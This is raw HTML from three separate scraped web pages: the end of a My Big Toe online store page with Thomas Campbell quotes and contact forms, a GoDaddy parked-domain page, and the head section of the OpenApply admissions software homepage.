class="woocommerce-Price-currencySymbol">&#36;</span>15.50</span><a href="/?add-to-cart=212" data-quantity="1" class="button product_type_simple add_to_cart_button ajax_add_to_cart" data-product_id="212" data-product_sku="Awakening PB" aria-label="Add &ldquo;Book 1: Awakening (Paperback)&rdquo; to your cart" rel="nofollow">Add to cart</a></p> </div> </div> <div class="col-md-4"> <div class="product-container"> <figure> <a href="https://www.my-big-toe.com/store1/london-lecture-dvd-ntsc/"><img width="600" height="867" src="https://www.my-big-toe.com/wp-content/uploads/2014/12/600x867xLLP20DVDP20Front.jpg.pagespeed.ic_.QRWUz3bG4E.jpg" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="" srcset="https://www.my-big-toe.com/wp-content/uploads/2014/12/600x867xLLP20DVDP20Front.jpg.pagespeed.ic_.QRWUz3bG4E.jpg 600w, https://www.my-big-toe.com/wp-content/uploads/2014/12/600x867xLLP20DVDP20Front.jpg.pagespeed.ic_.QRWUz3bG4E-207x300.jpg 207w" sizes="(max-width: 600px) 100vw, 600px" /></a> </figure> <span class="title">London Lecture DVD (NTSC)</span> <span class="price">$</span> </div> <div class="clear"></div> <div class="btn-prod-wrap"> <p class="product woocommerce add_to_cart_inline " style="border:4px solid #ccc; padding: 12px;"><a href="https://www.my-big-toe.com/store1/london-lecture-dvd-ntsc/" data-quantity="1" class="button product_type_simple" data-product_id="43" data-product_sku="LL DVD" aria-label="Read more about &ldquo;London Lecture DVD (NTSC)&rdquo;" rel="nofollow">Read more</a></p> </div> </div> <div class="col-md-4"> <div class="product-container"> <figure> <a href="https://www.my-big-toe.com/store1/tmi-keynote-address-dvd-ntsc/"><img width="383" height="566" src="https://www.my-big-toe.com/wp-content/uploads/2014/12/383x566xTMIP20KAP20DVDP20Cover0002.jpg.pagespeed.ic_.hjuw4klKw6.jpg" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="" srcset="https://www.my-big-toe.com/wp-content/uploads/2014/12/383x566xTMIP20KAP20DVDP20Cover0002.jpg.pagespeed.ic_.hjuw4klKw6.jpg 383w, https://www.my-big-toe.com/wp-content/uploads/2014/12/383x566xTMIP20KAP20DVDP20Cover0002.jpg.pagespeed.ic_.hjuw4klKw6-203x300.jpg 203w" sizes="(max-width: 383px) 100vw, 383px" /></a> </figure> <span class="title">TMI Keynote Address DVD (NTSC)</span> <span class="price">$</span> </div> <div class="clear"></div> <div class="btn-prod-wrap"> <p class="product woocommerce add_to_cart_inline " style="border:4px solid #ccc; padding: 12px;"><a href="https://www.my-big-toe.com/store1/tmi-keynote-address-dvd-ntsc/" data-quantity="1" class="button product_type_simple" data-product_id="45" data-product_sku="TMI KA DVD" aria-label="Read more about &ldquo;TMI Keynote Address DVD (NTSC)&rdquo;" rel="nofollow">Read more</a></p> </div> </div> </div></li> <!--/.wrap--> </ul> </div> <style> .amount { display: none !important;} </style> <div class="col-md-12"> <div class="btn-wrap"> <span><a href="https://www.my-big-toe.com/shop/" class="button button-cta">See all Products</a></span> </div> </div> <div class="col-md-10 col-md-offset-1"> <div class="trust-shop"> <img src="https://www.my-big-toe.com/wp-content/themes/mybigtoe/images/ts1.png" alt=""> <img src="https://www.my-big-toe.com/wp-content/themes/mybigtoe/images/ts2.png" alt=""> <img src="https://www.my-big-toe.com/wp-content/themes/mybigtoe/images/ts3.png" alt=""> <img src="https://www.my-big-toe.com/wp-content/themes/mybigtoe/images/ts4.png" alt=""> </div> </div> </div> </div> </section> <section class="section-wrap quote-wrap"> <div class="container"> <div class="row"> <div class="col-md-12"> <div class="quote-container flexslider"> <ul class="slides"> <li> <div class="quote" id="q275"> <cite> The ideal is to turn intellectual beliefs into knowledge based on direct experience. </cite> <strong>Thomas Campbell</strong> </div> </li> <li> <div class="quote" id="q273"> <cite> In short, Believe Nothing, Explore Everything, Know what you Know. Know More. </cite> <strong>Thomas Campbell</strong> </div> </li> <li> <div class="quote" id="q277"> <cite> Fundamental assumptions in general and scientific assumptions in particular are so hard to overturn because they are based on belief. Beliefs are so hard to overcome because they are irrational and therefore do not yield to logical argument. </cite> <strong>Thomas Campbell</strong> </div> </li> <li> <div class="quote" id="q285"> <cite> That a million smart people say "yes" is not a good reason for you to say "yes" if you do not have the experience and understanding to support it. Determining truth is not a democratic process ruled by the majority. It is also not something that someone else can do for you. Do not let these smart people sway you to agree with them simply because they are smart. </cite> <strong>Thomas Campbell</strong> </div> </li> <li> <div class="quote" id="q268"> <cite> After we grow up enough, we no longer need pain to get our attention -- we learn to continue growing while remaining happy and positive because we understand the nature of existence -- we already know what really matters and why. Our capacity to love and to give expands without being prodded by pain and misfortune. </cite> <strong>Thomas Campbell</strong> </div> </li> <li> <div class="quote" id="q264"> <cite> If it is not your truth, based on your experience, then don’t believe it -- Remain skeptical and open minded. Whether it is true or not is the wrong question. </cite> <strong>Thomas Campbell</strong> </div> </li> <li> <div class="quote" id="q266"> <cite> There is but one truth, however there are many expressions of it. </cite> <strong>Thomas Campbell</strong> </div> </li> <li> <div class="quote" id="q289"> <cite> Your belief systems limit your reality to a sub-set of the solution space that does not contain the answer. </cite> <strong>Thomas Campbell</strong> </div> </li> <li> <div class="quote" id="q279"> <cite> It's not about the body; you are consciousness. That's what you are. Your consciousness is already out of your body. You don't need to get out of your body; you just need to get into your consciousness. </cite> <strong>Thomas Campbell</strong> </div> </li> <li> <div class="quote" id="q262"> <cite> We do whatever comes to us at the moment -- what we do matters little -- the intent behind the doing is an expression of our being that matters much. The feedback from the doing informs the quality of the being to modify its intent -- this is the bootstrap by which we pull ourselves up. </cite> <strong>Thomas Campbell</strong> </div> </li> </ul> </div> </div> </div> </div> </section> <!-- Modal --> <div class="modal fade" id="myModal" tabindex="-1" role="dialog" aria-labelledby="myModalLabel" aria-hidden="true"> <div class="modal-dialog"> <div class="modal-content"> <div class="modal-header"> <button type="button" class="close" data-dismiss="modal" aria-label="Close"><span aria-hidden="true">&times;</span></button> <h4 class="modal-title" id="myModalLabel">Speaking Engagements</h4> </div> <div class="modal-body"> <div class='gf_browser_unknown gform_wrapper' id='gform_wrapper_1' ><a id='gf_1' class='gform_anchor' ></a><form method='post' enctype='multipart/form-data' target='gform_ajax_frame_1' id='gform_1' action='/#gf_1'> <div class='gform_body'><ul id='gform_fields_1' class='gform_fields top_label form_sublabel_below description_below'><li id='field_1_1' class='gfield field_sublabel_below field_description_below' ><label class='gfield_label' for='input_1_1_3' >Name</label><div class='ginput_complex ginput_container no_prefix has_first_name no_middle_name has_last_name no_suffix gf_name_has_2 ginput_container_name' id='input_1_1'> <span id='input_1_1_3_container' class='name_first' > <input type='text' name='input_1.3' id='input_1_1_3' value='' aria-label='First name' tabindex='1' /> <label for='input_1_1_3' >First</label> </span> <span id='input_1_1_6_container' class='name_last' > <input type='text' name='input_1.6' id='input_1_1_6' value='' aria-label='Last name' tabindex='2' /> <label for='input_1_1_6' >Last</label> </span> <div class='gf_clear gf_clear_complex'></div> </div></li><li id='field_1_2' class='gfield field_sublabel_below field_description_below' ><label class='gfield_label' for='input_1_2' >Email</label><div class='ginput_container ginput_container_email'> <input name='input_2' id='input_1_2' type='text' value='' class='medium' tabindex='3' /> </div></li><li id='field_1_3' class='gfield field_sublabel_below field_description_below' ><label class='gfield_label' for='input_1_3' >Phone</label><div class='ginput_container ginput_container_phone'><input name='input_3' id='input_1_3' type='text' value='' class='medium' tabindex='4' /></div></li><li id='field_1_4' class='gfield field_sublabel_below field_description_below' ><label class='gfield_label' for='input_1_4' >Event Name</label><div class='ginput_container ginput_container_text'><input name='input_4' id='input_1_4' type='text' value='' class='medium' tabindex='5' /></div></li><li id='field_1_5' class='gfield field_sublabel_below field_description_below' ><label class='gfield_label' for='input_1_5' >Date</label><div class='ginput_container ginput_container_date'> <input name='input_5' id='input_1_5' type='text' value='' class='datepicker medium mdy datepicker_with_icon' tabindex='6' /> </div> <input type='hidden' id='gforms_calendar_icon_input_1_5' class='gform_hidden' value='https://www.my-big-toe.com/wp-content/plugins/gravityforms/images/calendar.png'/></li><li id='field_1_7' class='gfield field_sublabel_below field_description_below' ><label class='gfield_label' for='input_1_7' >More Info</label><div class='ginput_container ginput_container_textarea'> <textarea name='input_7' id='input_1_7' class='textarea small' tabindex='7' rows='10' cols='50'></textarea> </div></li> </ul></div> <div class='gform_footer top_label'> <input type='submit' id='gform_submit_button_1' class='gform_button button' value='Submit' tabindex='8' onclick='if(window["gf_submitting_1"]){return false;} window["gf_submitting_1"]=true; ' /> <input type='hidden' name='gform_ajax' value='form_id=1&amp;title=&amp;description=&amp;tabindex=1' /> <input type='hidden' class='gform_hidden' name='is_submit_1' value='1' /> <input type='hidden' class='gform_hidden' name='gform_submit' value='1' /> <input type='hidden' class='gform_hidden' name='gform_unique_id' value='' /> <input type='hidden' class='gform_hidden' name='state_1' value='WyJbXSIsIjA5Y2NkNjYzYjg5M2FhMzg0M2JlMDI4YWVkMjlmZDU2Il0=' /> <input type='hidden' class='gform_hidden' name='gform_target_page_number_1' id='gform_target_page_number_1' value='0' /> <input type='hidden' class='gform_hidden' name='gform_source_page_number_1' id='gform_source_page_number_1' value='1' /> <input type='hidden' name='gform_field_values' value='' /> </div> </form> </div> <iframe style='display:none;width:0px;height:0px;' src='about:blank' name='gform_ajax_frame_1' id='gform_ajax_frame_1'></iframe> <script type='text/javascript'>jQuery(document).ready(function($){gformInitSpinner( 1, 'https://www.my-big-toe.com/wp-content/plugins/gravityforms/images/spinner.gif' );jQuery('#gform_ajax_frame_1').load( function(){var contents = jQuery(this).contents().find('*').html();var is_postback = contents.indexOf('GF_AJAX_POSTBACK') >= 0;if(!is_postback){return;}var form_content = jQuery(this).contents().find('#gform_wrapper_1');var is_confirmation = jQuery(this).contents().find('#gform_confirmation_wrapper_1').length > 0;var is_redirect = contents.indexOf('gformRedirect(){') >= 0;var is_form = form_content.length > 0 && ! is_redirect && ! is_confirmation;if(is_form){jQuery('#gform_wrapper_1').html(form_content.html());setTimeout( function() { /* delay the scroll by 50 milliseconds to fix a bug in chrome */ jQuery(document).scrollTop(jQuery('#gform_wrapper_1').offset().top); }, 50 );if(window['gformInitDatepicker']) {gformInitDatepicker();}if(window['gformInitPriceFields']) {gformInitPriceFields();}var current_page = jQuery('#gform_source_page_number_1').val();gformInitSpinner( 1, 'https://www.my-big-toe.com/wp-content/plugins/gravityforms/images/spinner.gif' );jQuery(document).trigger('gform_page_loaded', [1, current_page]);window['gf_submitting_1'] = false;}else if(!is_redirect){var confirmation_content = jQuery(this).contents().find('#gforms_confirmation_message_1').html();if(!confirmation_content){confirmation_content = contents;}setTimeout(function(){jQuery('#gform_wrapper_1').replaceWith('<' + 'div id=\'gforms_confirmation_message_1\' class=\'gform_confirmation_message_1 gforms_confirmation_message\'' + '>' + confirmation_content + '<' + '/div' + '>');jQuery(document).scrollTop(jQuery('#gforms_confirmation_message_1').offset().top);jQuery(document).trigger('gform_confirmation_loaded', [1]);window['gf_submitting_1'] = false;}, 50);}else{jQuery('#gform_1').append(contents);if(window['gformRedirect']) {gformRedirect();}}jQuery(document).trigger('gform_post_render', [1, current_page]);} );} );</script><script type='text/javascript'> if(typeof gf_global == 'undefined') var gf_global = {"gf_currency_config":{"name":"U.S. Dollar","symbol_left":"$","symbol_right":"","symbol_padding":"","thousand_separator":",","decimal_separator":".","decimals":2},"base_url":"https:\/\/www.my-big-toe.com\/wp-content\/plugins\/gravityforms","number_formats":[],"spinnerUrl":"https:\/\/www.my-big-toe.com\/wp-content\/plugins\/gravityforms\/images\/spinner.gif"};jQuery(document).bind('gform_post_render', function(event, formId, currentPage){if(formId == 1) {if(!/(android)/i.test(navigator.userAgent)){jQuery('#input_1_3').mask('(999) 999-9999').bind('keypress', function(e){if(e.which == 13){jQuery(this).blur();} } );}} } );jQuery(document).bind('gform_post_conditional_logic', function(event, formId, fields, isInit){} );</script><script type='text/javascript'> jQuery(document).ready(function(){jQuery(document).trigger('gform_post_render', [1, 1]) } ); </script> </div> <div class="modal-footer"> <button type="button" class="btn btn-default" data-dismiss="modal">Close</button> </div> </div> </div> </div> <!--<section class="section-wrap blue" id="contact"> <div class="container"> <div class="row"> <div class="col-md-12 text-center"> <h2>Contact</h2> </div> <div class="col-md-5 col-md-offset-1 js-animate-left"> <ul> <li> <span>Customer Service</span> <a href="https://www.my-big-toe.com/customer-service/">Customer Service</a> </li> <li> <span>If you wish to order books with a credit card over the phone instead of online. <br> Call Toll Free: 1-800-901-2122 <br> </span> </li> <li> <span>Social</span> <div class="social"> <a href="https://www.facebook.com/pages/MBT-Events/228814097168083?ref=hl" target="_blank" rel="nofollow"><i class="fa fa-facebook"></i></a> <a href="https://plus.google.com/u/0/101062106060796458216/posts" target="_blank" rel="nofollow"><i class="fa fa-google-plus"></i></a> <a href="" target="_blank" rel="nofollow"><i class="fa fa-rss"></i></a> </div> </li> </ul> </div> <div class="col-md-5 js-animate-right"> <div class='gf_browser_unknown gform_wrapper gplaceholder_wrapper' id='gform_wrapper_2' ><a id='gf_2' class='gform_anchor' ></a><form method='post' enctype='multipart/form-data' target='gform_ajax_frame_2' id='gform_2' class='gplaceholder' action='/#gf_2'> <div class='gform_body'><ul id='gform_fields_2' class='gform_fields top_label form_sublabel_below description_below'><li id='field_2_1' class='gfield field_sublabel_below field_description_below' ><label class='gfield_label' for='input_2_1' >Name</label><div class='ginput_container ginput_container_name'> <input name='input_1' id='input_2_1' type='text' value='' class='large' tabindex='1' /> </div></li><li id='field_2_2' class='gfield field_sublabel_below field_description_below' ><label class='gfield_label' for='input_2_2' >Email</label><div class='ginput_container ginput_container_email'> <input name='input_2' id='input_2_2' type='text' value='' class='large' tabindex='2' /> </div></li><li id='field_2_4' class='gfield gfield_contains_required field_sublabel_below field_description_below' ><label class='gfield_label' for='input_2_4' >Message<span class='gfield_required'>*</span></label><div class='ginput_container ginput_container_textarea'> <textarea name='input_4' id='input_2_4' class='textarea small' tabindex='3' rows='10' cols='50'></textarea> </div></li><li id='field_2_5' class='gfield field_sublabel_below field_description_below' ><label class='gfield_label' for='input_2_5' >Bot check</label><div class="ginput_container"><div class="g-recaptcha" data-sitekey="6Lci0AsUAAAAAHmBHuZ0jA5Pm_gdEoqUKuKPL3oT" data-theme="light"></div></div></li> </ul></div> <div class='gform_footer top_label'> <input type='submit' id='gform_submit_button_2' class='gform_button button' value='Submit' tabindex='4' onclick='if(window["gf_submitting_2"]){return false;} window["gf_submitting_2"]=true; ' /> <input type='hidden' name='gform_ajax' value='form_id=2&amp;title=&amp;description=&amp;tabindex=1' /> <input type='hidden' class='gform_hidden' name='is_submit_2' value='1' /> <input type='hidden' class='gform_hidden' name='gform_submit' value='2' /> <input type='hidden' class='gform_hidden' name='gform_unique_id' value='' /> <input type='hidden' class='gform_hidden' name='state_2' value='WyJbXSIsIjA5Y2NkNjYzYjg5M2FhMzg0M2JlMDI4YWVkMjlmZDU2Il0=' /> <input type='hidden' class='gform_hidden' name='gform_target_page_number_2' id='gform_target_page_number_2' value='0' /> <input type='hidden' class='gform_hidden' name='gform_source_page_number_2' id='gform_source_page_number_2' value='1' /> <input type='hidden' name='gform_field_values' value='' /> </div> </form> </div> <iframe style='display:none;width:0px;height:0px;' src='about:blank' name='gform_ajax_frame_2' id='gform_ajax_frame_2'></iframe> <script type='text/javascript'>jQuery(document).ready(function($){gformInitSpinner( 2, 'https://www.my-big-toe.com/wp-content/plugins/gravityforms/images/spinner.gif' );jQuery('#gform_ajax_frame_2').load( function(){var contents = jQuery(this).contents().find('*').html();var is_postback = contents.indexOf('GF_AJAX_POSTBACK') >= 0;if(!is_postback){return;}var form_content = jQuery(this).contents().find('#gform_wrapper_2');var is_confirmation = jQuery(this).contents().find('#gform_confirmation_wrapper_2').length > 0;var is_redirect = contents.indexOf('gformRedirect(){') >= 0;var is_form = form_content.length > 0 && ! is_redirect && ! is_confirmation;if(is_form){jQuery('#gform_wrapper_2').html(form_content.html());setTimeout( function() { /* delay the scroll by 50 milliseconds to fix a bug in chrome */ jQuery(document).scrollTop(jQuery('#gform_wrapper_2').offset().top); }, 50 );if(window['gformInitDatepicker']) {gformInitDatepicker();}if(window['gformInitPriceFields']) {gformInitPriceFields();}var current_page = jQuery('#gform_source_page_number_2').val();gformInitSpinner( 2, 'https://www.my-big-toe.com/wp-content/plugins/gravityforms/images/spinner.gif' );jQuery(document).trigger('gform_page_loaded', [2, current_page]);window['gf_submitting_2'] = false;}else if(!is_redirect){var confirmation_content = jQuery(this).contents().find('#gforms_confirmation_message_2').html();if(!confirmation_content){confirmation_content = contents;}setTimeout(function(){jQuery('#gform_wrapper_2').replaceWith('<' + 'div id=\'gforms_confirmation_message_2\' class=\'gform_confirmation_message_2 gforms_confirmation_message\'' + '>' + confirmation_content + '<' + '/div' + '>');jQuery(document).scrollTop(jQuery('#gforms_confirmation_message_2').offset().top);jQuery(document).trigger('gform_confirmation_loaded', [2]);window['gf_submitting_2'] = false;}, 50);}else{jQuery('#gform_2').append(contents);if(window['gformRedirect']) {gformRedirect();}}jQuery(document).trigger('gform_post_render', [2, current_page]);} );} );</script><script type='text/javascript'> if(typeof gf_global == 'undefined') var gf_global = {"gf_currency_config":{"name":"U.S. Dollar","symbol_left":"$","symbol_right":"","symbol_padding":"","thousand_separator":",","decimal_separator":".","decimals":2},"base_url":"https:\/\/www.my-big-toe.com\/wp-content\/plugins\/gravityforms","number_formats":[],"spinnerUrl":"https:\/\/www.my-big-toe.com\/wp-content\/plugins\/gravityforms\/images\/spinner.gif"};jQuery(document).bind('gform_post_render', function(event, formId, currentPage){if(formId == 2) {} } );jQuery(document).bind('gform_post_conditional_logic', function(event, formId, fields, isInit){} );</script><script type='text/javascript'> jQuery(document).ready(function(){jQuery(document).trigger('gform_post_render', [2, 1]) } ); </script> </div> </div> </div> </section>--> <footer class="footer" role="contentinfo"> <div class="container"> <div class="text-center js-animate-center"> 2014 © My Big Toe LLC. <a href="https://www.my-big-toe.com/privacy-notice/">Privacy Notice</a> | <a href="https://www.my-big-toe.com/shipping-returns/">Shipping & Returns</a> <br> Designed and Developed by <a href="http://seattleseoconsultant.com/" target="_blank" rel="nofollow">SeattleSeoConsultant.com</a> </div> </div> </footer><!-- #colophon --> <div style="display:none"> </div> <script type="text/javascript"> var c = document.body.className; c = c.replace(/woocommerce-no-js/, 'woocommerce-js'); document.body.className = c; </script> <link rel='stylesheet' id='gforms_reset_css-css' href='https://www.my-big-toe.com/wp-content/plugins/gravityforms/css/formreset.min.css' type='text/css' media='all' /> <link rel='stylesheet' id='gforms_formsmain_css-css' href='https://www.my-big-toe.com/wp-content/plugins/gravityforms/css/formsmain.min.css' type='text/css' media='all' /> <link rel='stylesheet' id='gforms_ready_class_css-css' href='https://www.my-big-toe.com/wp-content/plugins/gravityforms/css/readyclass.min.css' type='text/css' media='all' /> <link rel='stylesheet' id='gforms_browsers_css-css' href='https://www.my-big-toe.com/wp-content/plugins/gravityforms/css/browsers.min.css' type='text/css' media='all' /> <script type='text/javascript' src='https://s0.wp.com/wp-content/js/devicepx-jetpack.js'></script> <script type='text/javascript' src='https://www.my-big-toe.com/wp-content/plugins/woocommerce/assets/js/jquery-blockui/jquery.blockUI.min.js'></script> <script type='text/javascript'> /* <![CDATA[ */ var wc_add_to_cart_params = {"ajax_url":"\/wp-admin\/admin-ajax.php","wc_ajax_url":"\/?wc-ajax=%%endpoint%%","i18n_view_cart":"View cart","cart_url":"https:\/\/www.my-big-toe.com\/cart\/","is_cart":"","cart_redirect_after_add":"no"}; /* ]]> */ </script> <script type='text/javascript' src='https://www.my-big-toe.com/wp-content/plugins/woocommerce/assets/js/frontend/add-to-cart.min.js'></script> <script type='text/javascript' src='https://www.my-big-toe.com/wp-content/plugins/woocommerce/assets/js/js-cookie/js.cookie.min.js'></script> <script type='text/javascript'> /* <![CDATA[ */ var woocommerce_params = {"ajax_url":"\/wp-admin\/admin-ajax.php","wc_ajax_url":"\/?wc-ajax=%%endpoint%%"}; /* ]]> */ </script> <script type='text/javascript' src='https://www.my-big-toe.com/wp-content/plugins/woocommerce/assets/js/frontend/woocommerce.min.js'></script> <script type='text/javascript'> /* <![CDATA[ */ var wc_cart_fragments_params = {"ajax_url":"\/wp-admin\/admin-ajax.php","wc_ajax_url":"\/?wc-ajax=%%endpoint%%","cart_hash_key":"wc_cart_hash_c20ce6441e4e0bfdacce3c831047edf9","fragment_name":"wc_fragments_c20ce6441e4e0bfdacce3c831047edf9","request_timeout":"5000"}; /* ]]> */ </script> <script type='text/javascript' src='https://www.my-big-toe.com/wp-content/plugins/woocommerce/assets/js/frontend/cart-fragments.min.js'></script> <script type='text/javascript'> jQuery( 'body' ).bind( 'wc_fragments_refreshed', function() { jQuery( 'body' ).trigger( 'jetpack-lazy-images-load' ); } ); </script> <script type='text/javascript' src='https://secure.gravatar.com/js/gprofiles.js'></script> <script type='text/javascript'> /* <![CDATA[ */ var WPGroHo = {"my_hash":""}; /* ]]> */ </script> <script type='text/javascript' src='https://www.my-big-toe.com/wp-content/plugins/jetpack/modules/wpgroho.js'></script> <script type='text/javascript' src='https://cdnjs.cloudflare.com/ajax/libs/underscore.js/1.4.4/underscore-min.js'></script> <script type='text/javascript' src='https://www.my-big-toe.com/wp-content/uploads/youmax2-mirror/youmax.js'></script> <script type='text/javascript' src='//maxcdn.bootstrapcdn.com/bootstrap/3.3.1/js/bootstrap.min.js'></script> <script type='text/javascript' src='https://www.my-big-toe.com/wp-content/themes/mybigtoe/js/plugins.js'></script> <script type='text/javascript' src='https://www.my-big-toe.com/wp-content/themes/mybigtoe/js/application.js'></script> <script type='text/javascript' src='https://www.my-big-toe.com/wp-includes/js/comment-reply.min.js'></script> <script type='text/javascript' src='https://www.my-big-toe.com/wp-content/plugins/youtube-embed-plus/scripts/fitvids.min.js'></script> <script type='text/javascript' src='https://www.my-big-toe.com/wp-includes/js/wp-embed.min.js'></script> <script type='text/javascript' src='https://www.my-big-toe.com/wp-content/plugins/gravityforms/js/jquery.json.js'></script> <script type='text/javascript' src='https://www.my-big-toe.com/wp-content/plugins/gravityforms/js/gravityforms.min.js'></script> <script type='text/javascript' src='https://www.my-big-toe.com/wp-content/plugins/gravityforms/js/jquery.maskedinput.min.js'></script> <script type='text/javascript' src='https://www.google.com/recaptcha/api.js?render=explicit'></script> <script type='text/javascript' src='https://www.my-big-toe.com/wp-content/plugins/gravity-forms-no-captcha-recaptcha/public/js/gf-no-captcha-recaptcha-public.js'></script> <script type='text/javascript' src='https://stats.wp.com/e-201920.js' async='async' defer='defer'></script> <script type='text/javascript'> _stq = window._stq || []; _stq.push([ 'view', {v:'ext',j:'1:7.2.1',blog:'80290620',post:'4',tz:'0',srv:'www.my-big-toe.com'} ]); _stq.push([ 'clickTrackerInit', '80290620', '4' ]); </script> </body> </html>
0
<!-- Server: P3PWPARKDYN07 --><!DOCTYPE html><body style="padding:0; margin:0;"><html><head><meta name="viewport" content="width=device-width, initial-scale=1"></head><body><iframe src="http://parked-content.godaddy.com/park/pTW6pv1aLv1aqKVgrKM0qJphpTW6" style="visibility: visible;height: 100%; position:absolute" allowtransparency="true" marginheight="0" marginwidth="0" frameborder="0" width="100%"></iframe></body></html><!-- T: 2128 --><!-- Server: P3PWPARKDYN07 -->
0
<!DOCTYPE html> <!--[if IE 6]> <html id="ie6" lang="en-US" prefix="og: http://ogp.me/ns#"> <![endif]--> <!--[if IE 7]> <html id="ie7" lang="en-US" prefix="og: http://ogp.me/ns#"> <![endif]--> <!--[if IE 8]> <html id="ie8" lang="en-US" prefix="og: http://ogp.me/ns#"> <![endif]--> <!--[if !(IE 6) | !(IE 7) | !(IE 8) ]><!--> <html lang="en-US" prefix="og: http://ogp.me/ns#"> <!--<![endif]--> <head> <meta charset="UTF-8" /> <meta name="google-site-verification" content="tkaimPT_yiDzl6VgDPypUTQ1TQrfbr_OkGoTTXZJBX0" /> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <link rel="pingback" href="https://www.openapply.com/xmlrpc.php" /> <!--[if lt IE 9]> <script src="https://www.openapply.com/wp-content/themes/Divi/js/html5.js" type="text/javascript"></script> <![endif]--> <script type="text/javascript"> document.documentElement.className = 'js'; </script> <script>var et_site_url='https://www.openapply.com';var et_post_id='120788';function et_core_page_resource_fallback(a,b){"undefined"===typeof b&&(b=a.sheet.cssRules&&0===a.sheet.cssRules.length);b&&(a.onerror=null,a.onload=null,a.href?a.href=et_site_url+"/?et_core_page_resource="+a.id+et_post_id:a.src&&(a.src=et_site_url+"/?et_core_page_resource="+a.id+et_post_id))} </script><title>The Paperless Admissions Office - OpenApply</title> <script type="text/javascript"> var _hsq = _hsq || []; _hsq.push(["setContentType", "standard-page"]); </script> <meta name="description" content="OpenApply is an online admission system that centralises applicant records, simplifies communication and payments, and delivers stunning analytics." /> <meta name="robots" content="noodp" /> <link rel="canonical" href="https://www.openapply.com/" /> <meta property="og:locale" content="en_US" /> <meta property="og:type" content="website" /> <meta property="og:title" content="The Paperless Admissions Office - OpenApply" /> <meta property="og:description" content="OpenApply is an online admission system that centralises applicant records, simplifies communication and payments, and delivers stunning analytics." /> <meta property="og:url" content="https://www.openapply.com/" /> <meta property="og:site_name" content="OpenApply" /> <meta property="og:image" content="https://assets.public-prod.openapply.com/wp-content/uploads/2019/03/OpenApply-meta-tagline.png" /> <meta name="twitter:card" content="summary" /> <meta name="twitter:description" content="OpenApply is an online admission system that centralises applicant records, simplifies communication and payments, and delivers stunning analytics." /> <meta name="twitter:title" content="The Paperless Admissions Office - OpenApply" /> <meta name="twitter:site" content="@openapplyteam" /> <meta name="twitter:image" content="https://assets.public-prod.openapply.com/wp-content/uploads/2019/03/OpenApply-meta-tagline.png" /> <meta name="twitter:creator" content="@openapplyteam" /> <meta property="DC.date.issued" content="2018-09-25T12:40:14+01:00" /> <script type='application/ld+json'>{"@context":"http:\/\/schema.org","@type":"WebSite","@id":"#website","url":"https:\/\/www.openapply.com\/","name":"OpenApply","potentialAction":{"@type":"SearchAction","target":"https:\/\/www.openapply.com\/?s={search_term_string}","query-input":"required name=search_term_string"}}</script> <script type='application/ld+json'>{"@context":"http:\/\/schema.org","@type":"Organization","url":"https:\/\/www.openapply.com\/","sameAs":["https:\/\/twitter.com\/openapplyteam"],"@id":"#organization","name":"ManageBac","logo":"https:\/\/openapply.com\/images\/mb_logo.png"}</script> <meta name="google-site-verification" content="UA-30848013-3" /> <link rel='dns-prefetch' href='//js.hs-scripts.com' /> <link rel='dns-prefetch' href='//fonts.googleapis.com' /> <link rel="alternate" type="application/rss+xml" title="OpenApply &raquo; Feed" href="https://www.openapply.com/feed/" /> <link rel="alternate" type="application/rss+xml" title="OpenApply &raquo; Comments Feed" href="https://www.openapply.com/comments/feed/" /> <meta content="OpenApply v.5.0.7" name="generator" /><link rel='stylesheet' id='slickmap.css-css' href='https://www.openapply.com/wp-content/plugins/slick-sitemap//slickmap.css?ver=4080f30f0170c8d69127243c5d7f0aae' type='text/css' media='all' /> <link rel='stylesheet' id='wp-block-library-css' href='https://assets.public-prod.openapply.com/wp-includes/css/dist/block-library/style.min.css.gzip?ver=4080f30f0170c8d69127243c5d7f0aae' type='text/css' media='all' /> <link rel='stylesheet' id='ajax-load-more-css' href='https://www.openapply.com/wp-content/plugins/ajax-load-more/core/css/ajax-load-more.min.css?ver=4080f30f0170c8d69127243c5d7f0aae' type='text/css' media='all' /> <link rel='stylesheet' id='cookie-notice-front-css' href='https://assets.public-prod.openapply.com/wp-content/plugins/cookie-notice/css/front.min.css.gzip?ver=4080f30f0170c8d69127243c5d7f0aae' type='text/css' media='all' /> <link rel='stylesheet' id='wordpress-popular-posts-css-css' href='https://assets.public-prod.openapply.com/wp-content/plugins/wordpress-popular-posts/public/css/wpp.css.gzip?ver=4.0.6' type='text/css' media='all' /> <link rel='stylesheet' id='custom-article-cards-css' href='https://assets.public-prod.openapply.com/wp-content/plugins/divi-100-article-card/assets/css/style.css.gzip?ver=20160602' type='text/css' media='all' /> <style id='custom-article-cards-inline-css' type='text/css'> .divi-100-article-card .et_pb_blog_grid .article-card__category, .divi-100-article-card .et_pb_blog_grid .article-card__date { background-color: #1aaf5d; } .divi-100-article-card .et_pb_blog_grid .article-card__sub-title { color: #1aaf5d; } </style> <link rel='stylesheet' id='et_monarch-css-css' href='https://www.openapply.com/wp-content/plugins/monarch/css/style.css?ver=1.4.10' type='text/css' media='all' /> <link rel='stylesheet' id='et-gf-open-sans-css' href='https://fonts.googleapis.com/css?family=Open+Sans:400,700' type='text/css' media='all' /> <link rel='stylesheet' id='parent-style-css' href='https://www.openapply.com/wp-content/themes/Divi/style.css?ver=4080f30f0170c8d69127243c5d7f0aae' type='text/css' media='all' /> <link rel='stylesheet' id='child-style-css' href='https://www.openapply.com/wp-content/themes/openapply-divi/style.css?ver=5.0.7' type='text/css' media='all' /> <link rel='stylesheet' id='mobile-adjustment-css' href='https://www.openapply.com/wp-content/themes/openapply-divi/mobile.css?ver=4080f30f0170c8d69127243c5d7f0aae' type='text/css' media='all' /> <link rel='stylesheet' id='css-loader-css' href='https://www.openapply.com/plugins/css-loader/loader.css?ver=4080f30f0170c8d69127243c5d7f0aae' type='text/css' media='all' /> <link rel='stylesheet' id='getting started style-css' href='https://www.openapply.com/wp-content/themes/openapply-divi/get_start.css?ver=4080f30f0170c8d69127243c5d7f0aae' type='text/css' media='all' /> <link rel='stylesheet' id='divi-fonts-css' href='https://fonts.googleapis.com/css?family=Open+Sans:300italic,400italic,600italic,700italic,800italic,400,300,600,700,800&#038;subset=latin,latin-ext' type='text/css' media='all' /> <link rel='stylesheet' id='divi-style-css' href='https://www.openapply.com/wp-content/themes/openapply-divi/style.css?ver=3.21' type='text/css' media='all' /> <style id='divi-style-inline-css' type='text/css'> .mfp-iframe-holder .mfp-content { max-width: 900px; } 